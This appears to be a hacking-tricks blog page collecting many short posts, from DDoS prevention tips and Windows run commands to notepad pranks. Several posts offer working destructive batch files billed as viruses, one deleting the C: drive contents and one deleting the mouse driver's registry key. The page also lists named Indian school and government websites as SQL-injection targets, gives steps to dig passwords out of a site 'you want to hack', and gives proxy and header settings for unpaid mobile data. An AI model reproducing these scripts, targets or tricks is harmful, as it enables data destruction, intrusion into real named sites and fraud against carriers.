Showing posts with label Tricks. Show all posts
Showing posts with label Tricks. Show all posts

Sunday, August 28, 2016

3 Basic Tips To Prevent A DDoS Attack

 DDoS Attack

Distributed denial-of-service (DDoS) attacks are always in top headlines worldwide, as they are plaguing websites in banks, and virtually of almost every organization having a prominent online presence. The main cause behind the proliferation of DDoS attacks is that there is a very low-cost that the attacker has to incur to put such attack in motion. Fortunately, today various prevention methods have been developed to tackle such attacks. Before delving further into understanding about the ways to prevent DDoS attack, let’s first understand what exactly a DDoS attack is!

Understanding DDOS Attack

 DDoS Attack bot
A DDoS (distributed denial-of-service) attack is an attempt made by attackers to make computers’ resources inaccessible to its anticipated user. In order to carry out a DDOS attack the attackers never uses their own system; rather they create a network of zombie computers often called as a “Botnet” – that is a hive of computers, to incapacitate a website or a web server.

Let’s understand the basic idea! Now, the attacker notifies all the computers present on the botnet to keep in touch with a particular site or a web server, time and again. This increases traffic on the network that causes in slowing down the speed of a site for the intended users. Unfortunately, at times the traffic can be really high that could even lead to shutting a site completely.

3 Basic Tips to Prevent a DDoS Attack

There are several ways to prevent the DDOS attack; however, here in this guest post I’ll be covering three basic tips that will help you to protect your website from the DDoS attack.

1. Buy More Bandwidth.

 DDoS Attack bandwidth
One of the easiest methods is to ensure that you have sufficient bandwidth on your web. You’ll be able to tackle lots of low-scale DDOS attacks simply by buying more bandwidth so as to service the requests. How does it help? Well, distributed denial of service is a nothing more than a game of capacity. Let’s suppose you have 10,000 computer systems each distributing 1 Mbps directed towards your way. This means you’re getting 10 GB of data that is hitting your web server every second. Now, that’s causes a lot of traffic!

So to avoid such issue, you need to apply the same rule intended for normal redundancy. According to this technique, if you wish to have more web servers just multiply around diverse datacenters and next make use of load balancing. By spreading your traffic to various servers will help you balance the load and will most likely create large space adequate to handle the incessant increase in traffic.
However, there’s a problem with this method that is buying more bandwidth can be a costly affair. And as you’ll know that the current DDoS attacks are getting large, and can be a lot bigger exceeding your budget limit.

2. Opt for DDoS Mitigation Services.

A lot of network or Internet-service providers render DDoS mitigation capabilities. Look for an internet service provider having the largest DDoS protection and mitigation network, automated tools, and a pool of talented anti-DDoS technicians with the wherewithal to take action in real-time as per the varying DDoS attack characteristics. A viable alternative is to utilize a DDoS prevention appliance, which is specifically intended to discover and prevent distributed denial-of-service attacks.

3. Restricted Connectivity.

 DDoS Attack
In case you have computer systems that are connected to the web directly, a better idea is to properly install/configure your routers and firewall so as to limit the connectivity. For an instance, while receiving some data from a client machine you can only allow traffic to pass from the machine only on a few chosen ports (like HTTP, POP, SMTP etc.) via the firewall.

Wrapping Up!


Websites are largely getting attacked by hackers every second. Denial-of-service attack is insanely getting huge and is creating a lot of problems for business organizations having strong online vicinity. In this guest post you’ll not only understand what a DDoS attack actually means, but will also come to know about a few type of methods to prevent DDoS attacks. Aforementioned are three tips that I’ll recommend you to run through to at least understand where to get started towards building a resilient web network with chances of surviving a DDoS attack.
Share:

Simple Cool Tricks With Chrome Developer Tool

 Chrome Developer Tool
As you probably know, there is a button on the right-click menu of Google Chrome and IE 10+ called ''Inspect element''. This the developer tool. And you can have a lot of fun with it. I'll give you two examples on how to use it in this tutorial.

1. Change the text of a webpage:

You can have fun on webpages just by changing the value of a <span> (a text label). For example, go on the 4shared.com site (a free file sharing site). Then create an account if you don't have one (or just connect with Google, Facebook or Twitter). When you are done, upload something that is heavy (more than 100 MB) by dragging and dropping it on the home page of 4shared. Then you can see an uploading status window on the screen. So right-click on the percentage and click on ''Inspect element''. Now you can see a little window that appears on the bottom of the web browser. There are to ways : either you got the number or you got the % symbol. If you got the number, try to find the symbol below. Then double-click on it and type what you want (Eg: '',000,000 dollars in my bank account'')

google chrome tricks

2. Get a Non-Crypted password in JS/PhP code:

Some sites are not very safe and just verify the password directly in the PhP/JS code. Then, even if it become rare, you can get the password. Just follow these steps :

  1. Find the login form on the website you want to hack
  2. Right-click on it and then click on ''Inspect element''
  3. Search on the window that appeared ''<form'' and then ''action=''
  4. After it, there is a URL, If it ends by ''.js'', just copy it and paste it in the URL bar of your browser
  5. If it ends by ''.php'', type ''view-source:'' before pasting the URL
  6. Then search something like ''password'' in the code.
WARNING: This method works better with JS than with PHP. Sometimes, there is no URL after ''action='' but just a JS function. Then you have to press Ctrl+U to see the source and search for ''password'' in the whole code.
Share:

Top 5 Cool Notepad Tricks

notepad tricks
I had previously share some Interesting computer tricks as well as cool Batch fileprograms. In this post i will share with you guys some of the cool notepad tricks.As name suggest you don't require any program other then notepad. So lets get started.

1. World Trade Center Attack Trick

world trade center trick


The flight number of the plane that had hit World Trade Center on  (9/11) was Q33NY. Now we call this trick or a coincidence or something else but whatever it is you will be definately amazed by the this trick.

    1. Open Notepad and Type “Q33N” (without quotes) in capital letters.
    2. Increase the font size to 72.
    3. Change the Font to Wingdings.

2. Matrix Effect Trick

matrix effect trick
In this trick i will show you to make a batch file in notepad which will act as matrix effect that you might have seen in movies.Matrix effect is basically number flashes in green color.

    1. Open Noteapad and copy below code into it.

@echo off
color 02
:start
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
goto start

    2. Now save this file as Matrix.bat (name can be anything but .bat is must)
    3. Open your saved file and you will have matrix effect on your screen.

3. Creating Virus That Format C Drive

computer virus
In this trick we will be creating virus in notepad using batch file programming. This virus is really simple to create yet very dangerous. opening this file we delete or format C drive of your computer.

    1. Open Notepad and copy below code into it.

@Echo off
Del C:\ *.* |y
  
    2. Then Save this file as virus.bat
    3. Now, running this file format C Drive.

4. Making Personal Diary Using Notepad 

notepad tricks
Here you will learn to use notepad as Digital diary or a log book to keep record of your daily work instead of using pen and paper.

    1. Open Notepad and Type .LOG (in capital Letters and press enter
    2. Save the program with any name and close it.
    3. Open the file again. Now you can see current date and time, This will happen every time you reopen notepad

5. Dancing Keyboard Led


keyboard dancing led

In this part i will show you to make interesting file using notepad which will make keyboard led to dance. basically we will be creating a visual basic script.

    1. Open Notepad and copy below codes into it.

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop
    2. Then save this file as dance.vbs (name can be anything but .vbs is must)
    3. Open your save file and see your keyboard led blinking like disco lights.
Share:

Fresh List of SQL Vulnerable Indian Sites 2015-2016 - 8/28/2016

http://www.opjms.edu.in/newsDetails.php?c=1&ID=2

http://mce.edu.in/pgcourses.php?p=mba&id=2

http://www.dias.edu.in/content.php?id=2

http://www.cimat.edu.in/view_news.php?id=2

http://www.pinnacle.edu.in/vacancy_detail.php?id=2

http://mitmoradabad.edu.in/articlesdetails.php?id=2

http://www.skitm.edu.in/faculty.php?id=2

http://www.kiims.edu.in/page.php?id=2

http://oxfordschool.edu.in/newsDetails.php?c=1&ID=2

http://maiti.edu.in/events_details.php?id=2

http://mags.edu.in/aboutus.php?id=2

http://www.maduraitech.edu.in/news_details.php?id=2

http://www.reliableinstitute.edu.in/get_news.php?id=2



http://mitmoradabad.edu.in/articlesdetails.php?id=2

 

GIFT: 1 government sqli site 

http://dairy.maharashtra.gov.in/index.ph...ng=en&id=2

Share:

How to Record Whats App Calls On Your Mobile Phones

How to Record Whatsapp Calls I’ve been searching for Whatsapp news and come to know that we cal also record WhatsApp calls no matter you are using android, Iphone IOS or windows phone. This is not an official feature that comes with Whatsapp you need to install an alternative app that does this trick for you and can record all the important calls your having on WhatsApp. Calling feature in WhatsApp is like life saver and nowadays we are using this more that normal calling as I think cause it save our money and we can also call over the world over the internet without any extra charges so maybe some of you there want to save you conversation or record the calls over the WhatsApp so here is the solution for you.

How to Record Whatsapp Calls on Android

→ Get this app Real Call Recorder.
→ Download in your phone and install it.
→ Open the app and find for WhatsApp on the menu.
→ Check the WhatsApp box in the app.
→ Now here’s the magic begin.
→ Make a call over the WhatsApp.
→ It will record all the calls automatically in the background.
→ It will let you know when you finish the call and show you in the notification bar.
→ You can see all the recorded calls in the app and manage them.
→ Make sure the app is running in the background while making the call.

How to Record Whatsapp Calls on iPhone IOS

→ You must have jailbroken iPhone for this trick.
→ Go to Cydia and find Watusi under the BigBoss repo.
→ It is paid repo but you can also found for free in google
Share:

Airtel Free Unlimited 3G/ 4G Internet VPN Based TCP Trick 2016

1. 1st Of All Download DroidVPN From Here
2. After Download Go To This DroidVPN Link and SignUp for New Account: – Sign up
3. If You Have Already An Account On The Droidvpn Then You Can Use Here for Airtel Tricks
4. Now Open DroidVPN app and Now Click On Settings In Droid VPN
5. Now select connection protocol > select TCP
6. Select Proxy Settings as >> Enable
7. Selext Proxy Server as >> 195.189.123.135
8. And Port as >> 3128
9. Now Click on HTTP headers and Put HTTP HEADERS
Host: 180.179.103.247/
X-Online-Host: 180.179.103.247/
Or 
Host: 180.179.207.111/
X-Online-Host: 180.179.207.111/
10. Now Open the Settings and Select any One Free Servers from List
If You are Using and Wish to Use Troid Vpn then,.
Or
Use NMDVPN Config. Or PD Premium Or Droid Premium to Run Unlimited

Share:

How To Use DroidVPN For Free Internet ( Complete Guide )

How To Use DroidVPN

Today we’re going to show you the Complete Guide for How To Use DroidVPN For Free Internet. DroidVPN is an easy to use VPN software for android devices which can be used for using Free Internet in any of the India Telecom Operator. With the help of Droid VPN you can surf the internet anonymously by tunneling all your internet traffic from your android device to our servers. You can also browse the internet even if you are only allowed to send ping requests and internet browsing is blocked on your Windows firewall.


How To Use DroidVPN For Free Internet

Follow the steps given below to Enjoy Free Internet. 

Firstly, Download and Install Droid VPN in your Android Mobile. You can download it by clicking here. If you already have Droid VPN installed in your Android Mobile skip this steps.
You can also install it by using Google Play Store. Search directly on the play store for DroidVPN and install
After that, sign up for free Droid VPN account. You can sign up it by clicking here. You can also signup by Opening Droid VPN in your Android Mobile and click on Register a new account.
Now you have login details, the next step it to login. Open Droid VPN in your Android Mobile and go to setting, it can be found at Right Top Corner .
Now from settings, tap on Configure Your Account
From there fill your login details, that is, your email and your password.

DroidVPN Login

After fill your login details, that is, your email and your password, click on save my login details.
Now you are ready to connect to the Droid VPN Server.
Whenever you need to use Free Internet you can go to Settings > Connection Settings.


I hope this post for How To Use DroidVPN For Free Internet works for you as well. These different tricks are works in many different states. We constantly publish tricks on Networks. Keep checking our Network category regularly or subscribe our updates. You should try these Free Internet Tricks 2016 and You can bookmark our site or subscribe via Facebook , Twitter , or Subscribe to our mailing list and get interesting stuff and updates to your email inbox.
Share:

Sunday, September 13, 2015

Kill windows processes using CMD

  1 - open cmd 
 2 - type " tasklist " 
 
 3- Type " taskkill pid/ 8920 " 

             ? 8920 ? is the pid number of the program id  you want to kill or close !
  

  

Share:

How to Hide Hard Drive

 Step 1 - open Cmd 
 Step 2-  Type "Dіskраrt " and hit enter
 Step 3 -  Now you have to type  ” lіst vоlumе ” аnd Hit Enter to see the list of all drives details
 Step 4 - Now i have some personal data in my drive E which i dont want any other person to peep in, So i want to hide it, For that i will type ” Select volume D ”  and hit Enter.

By now you have selected the Drive successfully which you want to hide. But the last part which is to Hide the Drive is still remaining.
Step 6. To hide the drive you have to type “ Remove letter D ” and hit enter.
Congrats you have successfully Hidden the drive.

HOW DO I GET THE DRIVE BACK ?

Share:

How to Block any Website

  1- Go to C:\Windows\System32\drivers\etc









 2- Open hosts file in notepad
 3- Write 127.0.0.1 www.googl.com
 and save ! now google,com will be blocked


# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
#      102.54.94.97     rhino.acme.com          # source server
#       38.25.63.10     x.acme.com              # x client host
# localhost name resolution is handled within DNS itself.
# 127.0.0.1       localhost
# ::1             localhost
127.0.0.1  www.google.com






















Share:

Tuesday, September 8, 2015

Create a virus that disable mouse

How To Disable Mouse

  1. Open Notepad and copy below codes
rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ---------------------------------
  2. Save this file as  virus.bat
  3. Done you just created your virus.
Share:

Make Dangerous Virus In A Minute

What will this virus do ?  

You will create this virus using batch file programming. This virus will delete the C Drive completely. The good thing about this virus is that it is not detected by antivirus. 

How to Make the virus ?

   1. Open Notepad and copy below code into it.

@Echo off
Del C:\ *.* |y

   2. Save this file as virus.bat (Name can be anything but .bat is must)
   3. Now, running this file will delete all the content of C Drive.


Warning: Please don't try to run on your own computer or else it will delete all the content of your C Drive. I will not be responsible for any damage done to your computer.
Share:

Use Web Browsers As Text Editor

In this tutorial i will show you a simple and interesting trick to use your web browser such as Google Chrome or Mozilla Firefox as a simple text editor like Notepad. This trick works on all web browsers. So lets get started.

How To Do ?

1 Copy below code in browser Url Section
 data:text/html, <html contenteditable>

   2. Now Press Enter.
   3. Now you can type anything as would do on any other text editor like Notepad.
   4. To save your text file Press Ctrl + S and save it as anything.txt (.txt Is Must)


Share:

100+ Run Commands List


Accessibility Options : access.cpl
Add Hardware : hdwwiz.cpl
Add / Remove Programs : appwiz.cpl
Administrative Tools : control admintools
Automatic Updates : wuaucpl.cpl
Wizard file transfer Bluethooth : fsquirt
Calculator : calc
Certificate Manager : certmgr.msc
Character : charmap
Checking disk : chkdsk
Manager of the album (clipboard) : clipbrd
Command Prompt : cmd
Service components (DCOM) : dcomcnfg
Computer Management : compmgmt.msc
DDE active sharing : ddeshare
Device Manager : devmgmt.msc
DirectX Control Panel (if installed) : directx.cpl
DirectX Diagnostic Utility : dxdiag
Disk Cleanup : cleanmgr
System Information : dxdiag
Disk Defragmenter : dfrg.msc
Disk Management : diskmgmt.msc
Partition manager : diskpart
Display Properties : control desktop
Properties of the display (2) : desk.cpl
Properties display (tab "appearance") : control color
Dr. Watson : drwtsn32
Manager vérirficateur drivers : check
Event Viewer : Eventvwr.msc
Verification of signatures of files : sigverif
Findfast (if present) : findfast.cpl
Folder Options : control folders
Fonts (fonts) : control fonts
Fonts folder windows : fonts
Free Cell : freecell
Game Controllers : Joy.cpl
Group Policy (XP Pro) : gpedit.msc
Hearts (card game) : mshearts
IExpress (file generator. Cab) : IExpress
Indexing Service (if not disabled) : ciadv.msc
Internet Properties : inetcpl.cpl
IPConfig (display configuration) : ipconfig / all
IPConfig (displays the contents of the DNS cache) : ipconfig / displaydns
IPConfig (erases the contents of the DNS cache) : ipconfig / flushdns
IPConfig (IP configuration cancels maps) : ipconfig / release
IPConfig (renew IP configuration maps) : ipconfig / renew
Java Control Panel (if present) : jpicpl32.cpl
Java Control Panel (if present) : javaws
Keyboard Properties : control keyboard
Local Security Settings : secpol.msc
Local Users and Groups : lusrmgr.msc
Logout : logoff
Microsoft Chat : winchat
Minesweeper (game) : winmine
Properties of the mouse : control mouse
Properties of the mouse (2) : main.cpl
Network Connections : control NetConnect
Network Connections (2) : ncpa.cpl
Network configuration wizard : netsetup.cpl
Notepad : notepad
NView Desktop Manager (if installed) : nvtuicpl.cpl
Manager links : packager
Data Source Administrator ODBC : odbccp32.cpl
Screen Keyboard : OSK
AC3 Filter (if installed) : ac3filter.cpl
Password manager (if present) : Password.cpl
Monitor performance : perfmon.msc
Monitor performance (2) : perfmon
Dialing Properties (phone) : telephon.cpl
Power Options : powercfg.cpl
Printers and Faxes : control printers
Private Character Editor : eudcedit
Quicktime (if installed) : QuickTime.cpl
Regional and Language Options : intl.cpl
Editor of the registry : regedit
Remote desktop connection : mstsc
Removable Storage : ntmsmgr.msc
requests the operator to removable storage : ntmsoprq.msc
RSoP (traduction. ..) (XP Pro) : rsop.msc
Scanners and Cameras : sticpl.cpl
Scheduled Tasks : control schedtasks
Security Center : wscui.cpl
Console management services : services.msc
shared folders : fsmgmt.msc
Turn off windows : shutdown
Sounds and Audio Devices : mmsys.cpl
Spider (card game) : spider
Client Network Utility SQL server : cliconfg
System Configuration Editor : sysedit
System Configuration Utility : msconfig
System File Checker (SFC =) (Scan Now) : sfc / scannow
SFC (Scan next startup) : sfc / scanonce
SFC (Scan each démarraget) : sfc / scanboot
SFC (back to default settings) : sfc / revert
SFC (purge cache files) : sfc / purgecache
SFC (define size CAHC x) : sfc / cachesize = x
System Properties : sysdm.cpl
Task Manager : taskmgr
Telnet client : telnet
User Accounts : nusrmgr.cpl
Utility Manager (Magnifier, etc) : utilman
Windows firewall (XP SP2) : firewall.cpl
Microsoft Magnifier : magnify
Windows Management Infrastructure : wmimgmt.msc
Protection of the accounts database : syskey
Windows update : wupdmgr
Introducing Windows XP (if not erased) : tourstart
Wordpad : write
Date and Time Properties : timedate.cpl












Share:

Sunday, September 6, 2015

Dancing Keyboard Led

    1. Open Notepad and copy below codes into it.
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop
    2. Then save this file as dance.vbs (name can be anything but .vbs is must)
    3. Open your save file and see your keyboard led blinking like disco lights.
Share:

as